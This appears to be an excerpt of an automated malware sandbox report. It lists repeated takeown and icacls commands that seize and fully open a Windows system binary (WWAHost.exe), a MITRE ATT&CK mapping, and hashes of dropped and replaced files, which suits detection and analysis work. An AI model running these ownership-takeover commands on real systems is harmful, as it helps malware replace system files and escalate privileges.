  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3812
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3824
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3836
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3860
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3892
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:3908
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3876
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3920
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3928
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3936
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3964
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3984
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:3948
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3996
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4012
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4020
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4032
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4048
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:2540
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2672
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2280
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2224
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4092
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:4084
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:4068
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4056
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:2376
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4116
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4132
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4188
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:4168
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4208
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4156
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4148
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4140
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4124
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4224
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4240
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4248
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4256
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4272
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4280
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4288
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4296
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:4308
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4324
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:4332
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4344
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4360
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4372
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4388
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4408
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4424
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4436
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:4416
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:4444

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-860403594315172333474220189-1384600059-1591957521-1399181887-4552590031405886532"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19810602351752629516121717245910747976-8328338861023974749234765372457496161"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20977246541891830998-634027902300836251606555102-2051692588-1671534965765109832"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1686545370-52132822520731470962805803148085151244183983812852283862010428029"
1⤵
PID:2312

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "227271772-19337316871722571156528225401128759149-193282671-1741194157-1410408287"
1⤵
PID:1660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1118596607-447591239-13449941402097817811382666609-302140105-1412854570464019201"
1⤵
PID:268

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-302851612-600605446-16532408081960809789973902679-1573358949-16821930241670705153"
1⤵
PID:564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GJyJVffLL.exe

Filesize
458KB

MD5
05c9f78b8e9415f1db0fca5a293a85f5

SHA1
4527f383c23c979b9b5994616315bcf1492d508f

SHA256
6095eae371c43c6ceb215136218d5f9880288f7927ae5bed1cf47056b8b42256

SHA512
7f88fce8b5aef13a3c7acb7914f8ef49d97bb7b7d6d73bad08801b86391c650fdef44c50aaecf7def3de4ab1da919aabf4e0f06cce0624ce8b4d4e0c25ff2dd1

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
458KB

MD5
0d20f7aea0550a907c40372d7f133dba

SHA1
220c2caa86f8c001a5273de4fce00436ab3c8df3

SHA256
052c700642c93eb3ceba8e9afa55a060628f4670ad4949b3f25993988e569cb9

SHA512
e272aa471bb238995bf6f390af0218ff4ba33785d24ff2eae11be24a8d5702f261a2b95e40bfcb605cfaa9cf6dcf9af74be27353fc2b41c4ad8fc9d1ffaa1c88

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
458KB

MD5
0d20f7aea0550a907c40372d7f133dba

SHA1
220c2caa86f8c001a5273de4fce00436ab3c8df3

SHA256
052c700642c93eb3ceba8e9afa55a060628f4670ad4949b3f25993988e569cb9

SHA512
e272aa471bb238995bf6f390af0218ff4ba33785d24ff2eae11be24a8d5702f261a2b95e40bfcb605cfaa9cf6dcf9af74be27353fc2b41c4ad8fc9d1ffaa1c88

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
458KB

MD5
5fff7ba68bf03440e0769c74db2fd57c

SHA1
ea5cfbe5f7585e6f211afd35904020f08aaf9a8b

SHA256
41857774847c278012da715d5e68ba6e8755a619d1beb469f8135020f32c7c79

SHA512
951d8d2383bc3b5b2bf4a94f20863bcfe07807525b4962136935a85192d273ccac4ac29e069f290ae8c0ca89db7326b2e2462fc4112528fc690ccd8e0f2e7cf5

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
1c84e8cfb351276895fbcb44369cf03a

SHA1
8c54e07903895f8419f17b22b1488f68771a65f1

SHA256
b1bc33e8d80f929442f007d2296728e9cd43f2c870310798b0bb61139feb575c

SHA512
a14f5d045b9f1059776b2b5311528f62368d4aee1d2aa4b09bd07153a26eec6ab5d438a6808eb335398a8078d3827461aa038553be90a5565c135067b61ea6a5

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
622e0c915e78dd20d641ada32b8e162b

SHA1
7f18ecc3103c12ce2669c38ef2273e63ac1bd61a

SHA256
71d5e2461b605108c3379b086810244c586b5d3e94f348339d3ebbe0e4d0f2e8

SHA512
c4eece9fbb544acc5b0ae21a603dd83aa5681e9d50244e89e72d1a80b2c05a84e52ad19cde927c017eb9b699b0d34966766ba16895fccf45312eba938d553f00

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
fb1843a46c72e241df277243310e2051

SHA1
10df8747ca981003c10906a009b632c61309eee4

SHA256
0e71cde6c84e24939538ac0cdd339e7c9f66e0529a970a9cd3536e4396b3e88c

SHA512
db204df2ac0736d70a76b3a2edb757f557699c8eb319ff811852ec6bc90cd2a2858eafcbeec7bcf046033e01ff3d163319f625232f8a88fc95d4dca7a59ae8f2

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
f02a3b3cbc20a895d8a060518a0e7c7e

SHA1
5eefe3a49855bd1d76ac27c0fb9e23a4b78093bf

SHA256
e6ad072707c188da53d7cfd777ca8b42883c928261e8422b4cbed4bc6301e23e

SHA512
90ce1ffeec28515c2d65e29f0342ecec8056a358ebee675137d7b8670b15e61024e6ce0f3394a10ba49a2b7454d389e0644e60b7743295490200c3221134e294

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
76837f5ce10fb30c8aa9d3e042e5a43d

SHA1
a0cf1d5c304a5be1770dff677a439e3d013ab22d

SHA256
8fb5ed20ad800de7b33b1dc7f2de7994153282c2b59f683fc8e0496eab6d826c

SHA512
38805a19e2d94471f37460657ef5a94ce455b50ddda20251286442558a146df826d3927c4abd52cfdfb47065c314123c701d2bff1364c06d8b428b4864d41b20

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
d267a8e60320cf61cf6d4e5930605033

SHA1
e662969d17e603bcd5b94497e7f475f9b18e5f1d

SHA256
602c61e0e36a767de17403691573cfe5134681dab178d24d01ff8ba9a27078fa

SHA512
7dee3cbe4c3e169137cd299d7c976e87d7040b9ce10e8f28cb95f89a5d044c86530e6efdc9755b52202052ccd11e0f8d3165ded6d5ff0a5f206923562b50fa57

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
623661c22b0ad94b17c07a21df225cf1

SHA1
d3fd9f6bd5f212ba3deab6d8812c2513e4937989

SHA256
9e29cb23bb7839206b9486be93934d721dd8e2cb51828dbc05457a3fb6911f24

SHA512
bfe4668573e236390ec6821e7f72e99f4932a30fc887ff8ebb2987811327e8e46f255f7d6c7a19828a4d548c04666ababcf5cd9f3a6b702acf6190b28d253216

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
5bab2b967242cd5eaf7fa5cdb7b9f281

SHA1
0e73cacbc81db683d2022efecc72ad667214a573

SHA256
e13760746aaf6a424ee34f5cab9e9f3569e75f71c20373bdf9c97a2223329b37

SHA512
1369ece4d39e497e9a5536d715f93bb107afdfebd84d19d446133ce540a9e3d85a14e0684b7635d2b89725eab0c871ec03fb12dc688a4470022d410c4f0f8b68

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
c982473a8e0214fd96f66adf1529c9d8

SHA1
3a60985a4711c2ab14a230f3c8bd46ba867900bf

SHA256
c52bde4e9fc0461d5cf2719c4cc68dc1baebd477e235b22db29e9d2f9004dac2

SHA512
ba8a8ae7258baef60cf760ce2c03bb247e0e881dd3be3f65ec861703e8e9146c9c7503e0572ebba166aebeec9990aef3eba5b5fadbcb11c65324e85e630859fd

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
90994ccf3d3b2960b50625c3c3631f01

SHA1
5182701645071e701179d08f5a83d694ad5012ee

SHA256
7fdc1d6cf67a52d1f2f529191434312c1848c5bf69c3fe51ef98226ed3be9a27

SHA512
d21e5a300c42d8ceb40cd74d8a41c5b426c8673d0af980a788fbffd68d9065279d4622e1feadc7827897662edc14480e6f1ae53d7294481d4ddc5feb7360aac6

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
a74e43bb06ba5ec277661d61d77cdb70

SHA1
19187b380adc0a037436660472ff7da35f2a425a

SHA256
193565a111b5873289a14c07c55013a95c3bd3fb064e0af8d6bd1dea803009bc

SHA512
56cc5f07a018cd9e49ca70e89f54d88b27ae1e851687900b3eb1bacee3ed44a565763d486576c551620a25ad138c0c44d5935c630fdc7e6d377c425f2ad3fece

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
a74e43bb06ba5ec277661d61d77cdb70

SHA1
19187b380adc0a037436660472ff7da35f2a425a

SHA256
193565a111b5873289a14c07c55013a95c3bd3fb064e0af8d6bd1dea803009bc

SHA512
56cc5f07a018cd9e49ca70e89f54d88b27ae1e851687900b3eb1bacee3ed44a565763d486576c551620a25ad138c0c44d5935c630fdc7e6d377c425f2ad3fece

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
92812618c13b110a3f140bf076c1c928

SHA1
f42990ed0033161b71a6fe3e856a90c6e73167d2

SHA256
2b863cb2fcc683706326a5916857fc3a83bbbdf1b04e3d0ddb1f73ce918f9a4a

SHA512
7d9c31bb915e2116f234ccfac7827bf2c5588195081a1cc5f44dc1c33f0d27568fdd57c67d6ac4c38396790c9d8fd69303de3b3a0ff60eb1487cea27c47d854d

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
8ed5d7dd23e737933754578fce7608dc

SHA1
8b260bcd16829366b8257c18b1a78adaf2b45999

SHA256
bfe5763f79987a74cc7be684b95d2c7ecfb61d278bf5fea3ec27a12f48be6e36

SHA512
ef3ca4faaccb0ea0d07e776add4e1b9148a3c990e240636842589b592cce76f2920218123571f9b3057812b4da71fdb72a2b229a77a8f2e843803aae5ac9b784

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
73d4efc6f0cfa14a5be89e1aa0f0a270

SHA1
7c611ef7344535e0f373be6df9e49374aa300890

SHA256
30bf2d229e3f9f010d2172d418c3845cc85b20bbc4cb16599b2d72849609d1db

SHA512
332c99cfd57f00f70164cbf8370d8b0da5d25571d3f972a14d6d94a65c8b7b9309446089c626738ab54054a58518a4d76a8111c2640bf10403eda1fc2b30afd1

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
65077cf21f8f47cb0669f4b82169f10f

SHA1
fdc2e208b9d5fa2524b0de53d9bde08732ddccdd

SHA256
b4b5cee9670c757fbcef2c2a607c7039c21fada9fae2f9ab8b36d5b3a07aab13

SHA512
3d797f89b5e41b34ac9f4f0f1a47c7707a303b645295df30f4e1c13be16fccab447bb1d6b82ab999e577afbf62a4358f840efb7f2946aa3cf005093726230663

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
381772e212bc685330a7739828ffae17

SHA1
192ba4652a07843ee09b22dfa0113504b279b74a

SHA256
4250d40ad347398bc43463bd8f36946e90de161e177fbeb5665aeb135933b0e1

SHA512
b8d036305d5b5f3a85976e8d1df92d3a60080b8cd47be71248c83a70af78aac89f3f66467d37893ad9042c81eae30d86a75c1cae6b265c62b477e5418009ecd5

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
91858721da96829d121a1f5f911dc246

SHA1
f5f250444b7b4466bab429505de1afed9a13e4c3

SHA256
fb40e10622aae9520c131358bca1b2d8f46951c396c2778214aa15e076530703

SHA512
5a4522c8235580b641e53dcefb1620b3b3b8e30eae1138774b1997eaed349e3f1f06173ce909333c293a67b4a71ff84af5d447787f6c125f0496e32309a06491

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
0b64fb20d9f064be37e557e69c7d86f8

SHA1
a54d1ac00e49b9371201907ef718a323c01df9d8

SHA256
960127ff62ae29b7ef1bec5fd6cc0e2ba54b94fb3ca8a26e2c3273e195d642c9

SHA512
e1d52fe20abaa39fe243f816a3533293c619bcc7c19aac2af3c5e7148b6c124012c65d4c721ba40df8c01d4e38fa8594e71fe3d10489aa9beacddc696dc47157

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
4b3dce96c6954e5519e0a2ef345f3a8b

SHA1
2201dfb67341b69a4ca9c6bd2c32fc18604a6888

SHA256
9b9fae3849c1856404a64bd9b14ed7ea1bd4ad365d8e2f9cf852b885f2d20639

SHA512
8d214fbcc02b892cf140209bd5e63ef9748b35538af69c8ea70ac43df1b61e095ee89a0dc5c38a71e38b334a445d24ca4dc0193ae248725c5ed54432ca04de69

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
582db4edb8b71632ac89b2a0f5a47873

SHA1
3c2964a7b7471e848f9bb83d973b76f26a685e34

SHA256
eeef37ad0c504d1a62f611e6e63a99236d9fed4c110cfdb99f253025282e49aa

SHA512
5bfc9ac3f44a2e1272e39710004a6e2c3a8a4e9a88b1b8801d90464fd61c0471728ec1d056e6bd974e982978a2adeeb338d76e6f2fde8e6f6715c34df87dbaee

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
d0f0b78396020380816b0bc70b9c839e

SHA1
03a820f30a25b8ad08b972e24ea7efc7a604aaef

SHA256
7e9fb6f5e9c9bb5cdd7b652b546f305f88f185fa02e8bf1925b0a7284c6ada2d

SHA512
5967677d3b886371949e735669ea439428592d4fd11af9878938c8bb999ebb29cea88d6bda5d90a1bfd6bcc16265a7da3f3815a823d064d806deb5d6e009a9bd

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
459KB

MD5
1eb61287a37f71f12cae2989da327af7

SHA1
eda95ea988237917177e78acf7616bb8adfa2590

SHA256
e82f716883c68650d546a8298aa8a52f60de92bb42f5585d9c2d981e57d00c39

SHA512
79d0fdd9f5e7ead3a7c50813ad14949ec64d7bb665555ec2ba45571c0b1831c91e6285594b88722ebfadb9148be4e5b21feb629b732038c32bc58f2d5b87a422

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
8469737f6e7343d594bc7aa1bab0d1ab

SHA1
ec668e31c5ae5a13946764e44cdbc42a63fb0d5a

SHA256
3e6132b33f63d7b7e5050cc04ef4ee1630bfbda179d38969fe9b388fdf729073

SHA512
09e4fea082bd73153a2e874636a98abd515f3fa747e9674d1930b08d4fc137c40110f21b4c6c3d41dbb5ba7b67eb1cab029db8bc5c2c5363ae635866c43f7006

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
8469737f6e7343d594bc7aa1bab0d1ab

SHA1
ec668e31c5ae5a13946764e44cdbc42a63fb0d5a

SHA256
3e6132b33f63d7b7e5050cc04ef4ee1630bfbda179d38969fe9b388fdf729073

SHA512
09e4fea082bd73153a2e874636a98abd515f3fa747e9674d1930b08d4fc137c40110f21b4c6c3d41dbb5ba7b67eb1cab029db8bc5c2c5363ae635866c43f7006

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
50640dbfe139839ccc1d47ce69a94894

SHA1
6b7d5c857ff2bce117c77b1adfc236ad03aee784

SHA256
ba31aba9867e10950332e8bb2269e2dda685c4a3bbbf878ad8f09c7f15749915

SHA512
758832410ac2f4465ae286b8ad5727a99c9293c7ce1412c6134b8cd09358f823aadae3a46e8b6e0c3cf556337520e566f4e9cca68f46eed0afaded0b0ab0b01a

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
50640dbfe139839ccc1d47ce69a94894

SHA1
6b7d5c857ff2bce117c77b1adfc236ad03aee784

SHA256
ba31aba9867e10950332e8bb2269e2dda685c4a3bbbf878ad8f09c7f15749915

SHA512
758832410ac2f4465ae286b8ad5727a99c9293c7ce1412c6134b8cd09358f823aadae3a46e8b6e0c3cf556337520e566f4e9cca68f46eed0afaded0b0ab0b01a

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
386636235077b3dd170e6dffe9897199

SHA1
8f1e9143fac64ff0a264d9daed01fd14abfda928

SHA256
b2a0aceb78e1014ead708efc69f74ec618e27c033031774a027ebea8cb2b5f85

SHA512
0534ccc3157c951f4c06884b7629c1d417f6d7d82fb9ebf00b2eb0850f6f4b481977dda69fc7615e622b59cd41292b548c6f50ebeb816e71337d9749e5fc8516

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
93499be40c1b81148bd7561c068ccd7d

SHA1
09a6d59ce6ce3c87c520fb97036e51abd8c7c340

SHA256
857249fa79ace664d3c0f342ca374ea712d835123dd7a509d2ebc59ee5505fe1

SHA512
2e0150edf5b7968422cdb20ef7160910a7331182e411a5dfb909cb51f34a014fbce9e55322a61d1c59e971f66d812f577ee1d552ae25e212ae538fd92e46ff85

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
93499be40c1b81148bd7561c068ccd7d

SHA1
09a6d59ce6ce3c87c520fb97036e51abd8c7c340

SHA256
857249fa79ace664d3c0f342ca374ea712d835123dd7a509d2ebc59ee5505fe1

SHA512
2e0150edf5b7968422cdb20ef7160910a7331182e411a5dfb909cb51f34a014fbce9e55322a61d1c59e971f66d812f577ee1d552ae25e212ae538fd92e46ff85

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
22ec1cd68cfbbe9c400a6ac21f0c5a8f

SHA1
5ff9f709d5a3159df39c9e15cf470d3b8f34f325

SHA256
774894de8ce36a35c8c5f781f8250f8b53d5995da054805ed492aaaafd757a8b

SHA512
ca5c430fb86350d23859c14ea904e67e7ed25df751048cb2e8e1f97ec3d07a5a847c451d05d9087504715d94e3ca226845eb0ae3fb07fa4721a99b556eb3d1c4

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
49162d140f24dac6ac741004cf62e96e

SHA1
415fa070ba0898917abe38e9fe72dfc2088a2f59

SHA256
76a10cb3ac95d9cb751f2bb02daa038c96fb23d013e4789f1d25e782c4cca8b2

SHA512
364641f3e06eae553fe979d7d4360c0d67d3a2468ec9099c91fe9f936de89e991b687f5678c1061d20668d1624c2b4bd89c85d044d22d3734fbeaa8602e763f3

Download Submit
C:\Windows\System32\WWAHost.exe

Filesize
460KB

MD5
d1a596bd1156d988e199d6690f40f64a

SHA1
ebe8ad15ce7fb62dd0abf23a74b7ad719515998f

SHA256
b929ceee53eab04e35a4d0e715fa3035a257b95fa32c40b4a2e3af241484ecc3

SHA512
36ff19802b777c31c69302e139ade76411f662177a8ea98fbab6e1e517d1ac2b35bd8f4c82aded9c419659f6338c230924d3b87cc91e47b263c8077b72d09c5a

Download Submit
